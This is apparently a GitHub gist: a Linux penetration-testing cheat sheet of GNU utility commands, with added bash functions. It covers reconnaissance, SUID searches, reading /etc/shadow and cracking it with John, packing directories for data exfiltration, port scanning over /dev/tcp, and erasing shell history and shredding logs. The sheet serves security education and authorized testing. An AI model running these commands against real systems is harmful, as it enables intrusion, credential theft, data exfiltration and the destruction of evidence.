@copyleftdev
Created August 24, 2024 06:56

🐧 Linux Penetration Testing with GNU Utils: The Ultimate Cheat Sheet

DISCLAIMER: This information is for educational purposes only. Always obtain proper authorization before performing any penetration testing activities. Unauthorized testing is illegal and unethical.

πŸ” Information Gathering

| Command | Description | Example |
|---------|-------------|---------|
| `netstat` | 🌐 Network connections, routing tables, interface statistics (net-tools; often missing on modern distros, where `ss` replaces it) | `netstat -tuln` |
| `ss` | 🔌 Socket statistics (iproute2): `-t` TCP, `-u` UDP, `-l` listening, `-n` numeric; add `-p` to see the owning process | `ss -tuln` |
| `ip` | 🖧 Show / manipulate routing, devices, policy routing and tunnels (`ip route` for the routing table) | `ip addr show` |
| `arp` | 📟 Display or manipulate the system ARP cache (net-tools; `ip neigh` is the iproute2 equivalent) | `arp -e` |
| `dig` | 🔍 DNS lookup utility (from dnsutils/bind-utils; not installed everywhere) | `dig example.com` |

💻 System Enumeration

| Command | Description | Example |
|---------|-------------|---------|
| `uname` | 💻 Print system information (kernel version and architecture) | `uname -a` |
| `lsof` | 📂 List open files; `-i` restricts the output to network sockets (not a GNU tool; `ss -p` is the fallback when it is absent) | `lsof -i` |
| `ps` | 📊 Report process status (`aux` shows every process with its owner) | `ps aux` |
| `who` | 👥 Show who is logged on | `who` |
| `w` | 👀 Show who is logged on and what they are doing | `w` |

🔓 File and Directory Operations

| Command | Description | Example |
|---------|-------------|---------|
| `find` | 🔎 Search for files in a directory hierarchy; `-perm -4000` matches SUID binaries, the classic local privilege-escalation target | `find / -perm -4000 -type f 2>/dev/null` |
| `grep` | 🔍 Search file patterns (`-r` recursive, `-i` case-insensitive) | `grep -ri "password" /etc/ 2>/dev/null` |
| `sed` | 🔄 Stream editor for filtering and transforming text; `-i` edits the file in place, so run it without `-i` first to preview the change | `sed -i 's/old/new/g' file.txt` |
| `awk` | 🔧 Pattern scanning and processing language; `-F:` sets the field separator | `awk -F: '{print $1}' /etc/passwd` |

πŸ” User and Permission Management

| Command | Description | Example |
|---------|-------------|---------|
| `id` | 🆔 Print user and group information | `id` |
| `sudo` | 🔑 Execute a command as another user; `-l` lists what the current user may run, the first thing to check for privilege escalation | `sudo -l` |
| `su` | 👤 Change user ID or become superuser | `su - username` |
| `chmod` | 🔒 Change file mode bits | `chmod 600 file.txt` |
| `chown` | 👑 Change file owner and group | `chown user:group file.txt` |

🌐 Network Probing

| Command | Description | Example |
|---------|-------------|---------|
| `ping` | 📡 Send ICMP ECHO_REQUEST to network hosts (`-c` limits the count; no reply may mean ICMP is filtered, not that the host is down) | `ping -c 4 192.168.1.1` |
| `traceroute` | 🗺️ Print the route packets take to a network host | `traceroute example.com` |
| `nc` | 🔌 TCP/IP swiss army knife; `-z` scans without sending data, `-v` reports results. Port-range syntax and `-z` differ between netcat variants (both work in OpenBSD and traditional netcat), so check `nc -h` first | `nc -zv 192.168.1.1 1-1000` |
| `curl` | 🌐 Transfer data from or to a server; `-I` sends a HEAD request and prints only the response headers | `curl -I http://example.com` |
| `wget` | 📥 Non-interactive network downloader | `wget http://example.com/file.txt` |

📡 Simple Servers

| Command | Description | Example |
|---------|-------------|---------|
| `python3 -m http.server` | 🌐 Serve the current directory over HTTP (Python 3; the Python 2 form was `python -m SimpleHTTPServer 8000`) | `python3 -m http.server 8000` |
| `nc -l` | 👂 Create a simple listening server. Traditional netcat takes the port with `-p`; OpenBSD netcat takes it as a positional argument (`nc -l 8000`) | `nc -l -p 8000` |

🔬 Post Exploitation

| Command | Description | Example |
|---------|-------------|---------|
| `cat /etc/passwd` | 👥 View user accounts (world-readable; field 3 is the UID, field 7 the login shell) | `cat /etc/passwd` |
| `cat /etc/shadow` | 🔑 View password hashes (requires root or membership of the `shadow` group) | `cat /etc/shadow` |
| `cat /etc/group` | 👥 View groups and their members | `cat /etc/group` |
| `ls -la /etc/cron*` | ⏰ List system cron jobs (per-user crontabs live under `/var/spool/cron`; `crontab -l` shows your own) | `ls -la /etc/cron*` |
| `ls -la ~/.ssh/` | 🔑 List SSH keys and `authorized_keys` for the current user | `ls -la ~/.ssh/` |
| `history` | 📜 View the current shell's command history (`~/.bash_history` holds what earlier sessions saved) | `history` |
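As an added example that is not part of the original gist, the `/etc/passwd` and cron checks from the table above turned into two small functions built only on `awk` and GNU `find`. File paths are parameters (an assumption of this example) so the same checks run against copies pulled off a target; the function names and output labels are this example's own.

```bash
#!/usr/bin/env bash
# Added example, not part of the original gist: turn the /etc/passwd and cron
# checks into repeatable functions. Paths are parameters so the checks can run
# against a copy of the target's files as well as the live system.

# Flag account entries worth a second look:
#   UID0   - an account other than root with UID 0 (root-equivalent backdoor)
#   NOPASS - empty password field (no password required on non-shadow systems;
#            on shadow systems confirm against /etc/shadow)
#   SHELL  - any account that still has an interactive login shell
# Usage: passwd_triage /etc/passwd
passwd_triage() {
    awk -F: '
        $3 == 0 && $1 != "root"              { print "UID0",   $1 }
        $2 == ""                             { print "NOPASS", $1 }
        $7 != "" && $7 !~ /(nologin|false)$/ { print "SHELL",  $1, $3, $7 }
    ' "$1"
}

# List cron files writable by group or others. Anything root's cron runs that a
# lower-privileged user can edit is a privilege-escalation path.
# -perm -002 = other-writable, -perm -020 = group-writable; -printf is GNU find.
# Usage: cron_writable /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/crontab
cron_writable() {
    find "$@" -type f \( -perm -002 -o -perm -020 \) \
        -printf '%m %u:%g %p\n' 2>/dev/null
}
```

Source the file and call the functions directly. On a live system `cron_writable` returns non-zero when one of the paths it is given does not exist; that is harmless interactively but worth knowing under `set -e`.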

📡 Data Exfiltration

| Command | Description | Example |
|---------|-------------|---------|
| `tar` | 📦 Create a gzip-compressed tarball on stdout (`-f -`) so it can be piped into whatever transport is available | `tar czf - /important` |
| `dd` | 💾 Convert and copy a file; with a block device as `if=` it streams a raw disk image to stdout (requires root, and the output is as large as the disk) | `dd if=/dev/sda` |
| `base64` | 🔑 Base64 encode/decode data so binary content survives text-only channels (`-d` decodes) | `base64 secretfile` |
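The `tar` and `base64` rows describe the two ends of a pipeline; as an added example that is not part of the original gist, here is that pipeline completed into a round trip with an integrity check. The transport between the two ends is deliberately left out (the blob is plain text, so any channel carries it), and the function names are this example's own.

```bash
#!/usr/bin/env bash
# Added example, not part of the original gist: the tar | base64 pipeline from
# the table, completed into a pack / unpack / verify round trip.

# Pack a directory into a single-line base64 blob on stdout.
# -C plus basename keep paths relative so the archive unpacks cleanly elsewhere;
# -w0 (GNU coreutils) disables line wrapping.
# Usage: pack_dir /important > blob.txt
pack_dir() {
    local dir=$1
    tar czf - -C "$(dirname "$dir")" "$(basename "$dir")" | base64 -w0
}

# Reverse of pack_dir: read the blob on stdin, extract under the given directory.
# Usage: unpack_dir /tmp/loot < blob.txt
unpack_dir() {
    local dest=$1
    mkdir -p "$dest" && base64 -d | tar xzf - -C "$dest"
}

# Order-independent fingerprint of every file under a directory, so both ends
# can confirm nothing was truncated or corrupted in transit.
# Usage: dir_digest /important
dir_digest() {
    (cd "$1" && find . -type f -print0 | sort -z | xargs -0 sha256sum) \
        | sha256sum | cut -d' ' -f1
}
```

Compare `dir_digest` on the source with `dir_digest` on the unpacked copy; a mismatch means the channel dropped or altered bytes. The same `| base64 -w0` tail works on the `dd` row, but a raw disk image is rarely worth moving in full; the `tar` form over the directories you actually need is the usual choice.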

🧹 Covering Tracks

| Command | Description | Example |
|---------|-------------|---------|
| `history -c` | 🧽 Clear the current shell's in-memory history | `history -c` |
| `echo "" > ~/.bash_history` | 🧼 Empty the bash history file (bash rewrites it from memory at exit, so pair this with `history -c` or `unset HISTFILE`) | `echo "" > ~/.bash_history` |
| `shred` | 🔥 Overwrite a file before deleting it (`-z` final zero pass, `-u` unlink). Not reliable on journaled, copy-on-write or snapshotted filesystems, where old blocks can survive | `shred -zu access.log` |
| `unset HISTFILE` | 🚫 Stop the current session from writing history to disk at exit | `unset HISTFILE` |

🔄 Useful One-Liners

# πŸ” Find all SUID executables
find / -perm -4000 -type f 2>/dev/null

# πŸ”Ž Find writable directories
find / -writable -type d 2>/dev/null

# 🌐 Scan for open ports
for p in {1..65535}; do nc -zv 192.168.1.1 $p 2>&1 | grep -v 'Connection refused'; done

# πŸ”‘ Generate a wordlist from website
curl http://example.com | grep -oE '\w+' | sort -u > wordlist.txt

# πŸ‘₯ Extract usernames from /etc/passwd
awk -F: '{print $1}' /etc/passwd

# πŸ“Ά Monitor network traffic
tcpdump -i eth0 -nn -s0 -v port 80

# πŸ”“ Crack /etc/shadow passwords with John (if installed)
unshadow /etc/passwd /etc/shadow > mypasswd && john mypasswd
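The port-scan one-liner above depends on `nc`, which is frequently absent on hardened hosts. As an added example that is not part of the original gist, the same connect scan using only bash's built-in `/dev/tcp/HOST/PORT` pseudo-files (the "bash built-ins for network operations" of the pro tips that follow) plus `timeout` from GNU coreutils. Function names are this example's own; `/dev/tcp` is implemented by bash itself and is not a real device node.

```bash
#!/usr/bin/env bash
# Added example, not part of the original gist: TCP connect scan and HTTP
# banner grab using bash's /dev/tcp pseudo-files instead of nc or curl.

# Return 0 if host:port accepts a TCP connection within $timeout seconds.
# The connect runs in a child bash so `timeout` (coreutils) can cut it off;
# host and port are passed as $0/$1 rather than spliced into the command string.
# Usage: tcp_open 192.168.1.1 22 && echo "ssh is up"
tcp_open() {
    local host=$1 port=$2 timeout=${3:-1}
    timeout "$timeout" bash -c 'exec 3<>"/dev/tcp/$0/$1"' "$host" "$port" 2>/dev/null
}

# Connect-scan a port range and print the open ones.
# Usage: tcp_scan 192.168.1.1 1 1024
tcp_scan() {
    local host=$1 first=$2 last=${3:-$2} p
    for p in $(seq "$first" "$last"); do
        tcp_open "$host" "$p" && echo "$host:$p open"
    done
    return 0
}

# Fetch an HTTP status line without curl or wget (3 s limit, CR stripped).
# Usage: http_status example.com 80
http_status() {
    timeout 3 bash -c '
        exec 3<>"/dev/tcp/$0/$1" || exit 1
        printf "HEAD / HTTP/1.0\r\nHost: %s\r\n\r\n" "$0" >&3
        IFS= read -r line <&3 && printf "%s\n" "$line" | tr -d "\r"
    ' "$1" "${2:-80}" 2>/dev/null
}
```

A refused connection returns immediately; a filtered port costs the full timeout, so keep the range tight or raise the timeout only for hosts you know are slow. `tcp_scan` is sequential by design: it is meant for the box you are already on, not as a replacement for a real scanner.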

πŸ† Pro Tips

  1. πŸ”§ Master text manipulation tools like sed, awk, and grep.
  2. πŸ“š Familiarize yourself with /proc filesystem for live system information.
  3. πŸ” Use openssl for encryption/decryption when needed.
  4. πŸ“‘ Leverage bash built-ins for network operations when other tools aren't available.
  5. 🧠 Combine commands with pipes (|) for powerful operations.
  6. πŸ” Use command substitution ($(command)) to use output of one command as arguments for another.
  7. πŸ“œ Create simple scripts to automate repetitive tasks.
  8. πŸ” Always clean up after your testing activities.
  9. πŸ“š Study man pages to discover lesser-known features of GNU utilities.
  10. πŸ§ͺ Practice in a controlled environment before real-world application.

Remember, these tools should only be used ethically and with explicit permission. Always respect legal and ethical boundaries in your security testing. 🛡️🔓
